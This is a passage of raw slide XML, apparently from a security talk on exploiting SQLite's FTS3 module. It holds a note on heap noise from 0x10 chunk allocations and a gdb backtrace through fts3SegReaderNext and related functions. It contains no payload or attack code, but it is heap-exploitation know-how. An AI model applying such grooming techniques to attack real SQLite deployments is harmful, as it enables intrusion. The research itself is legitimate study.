          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Because </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> is allocated on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bytecode Execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> phase</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>So many rogue 0x10 chunk allocations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(heap noise)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> happen before that phase…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="506184" y="2735581"/>
            <a:ext cx="11068047" cy="2687874"/>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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="607147" y="2745799"/>
            <a:ext cx="10866120" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>Breakpoint </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fts3SegReaderNext</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p=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x74b378</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>pReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x74b988</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>bIncr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sqlite3.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>168731</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>gdb</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8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>bt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fts3SegReaderNext</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p=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x74b378</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>pReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x74b988</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>bIncr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sqlite3.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>168731</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x00000000004e414a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fts3SegReaderStart</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p=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x74b378</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>pCsr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x74dbf8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>zTerm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x751128</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"sample"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>nTerm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sqlite3.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>170143</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x00000000004e427a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sqlite3Fts3MsrIncrStart</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p=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x74b378</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>pCsr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x74dbf8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>iCol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>zTerm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x751128</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"sample"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>nTerm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D8FA3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sqlite3.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>170183</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x00000000004d7699</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fts3EvalPhraseStart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>pCsr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x753fe8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
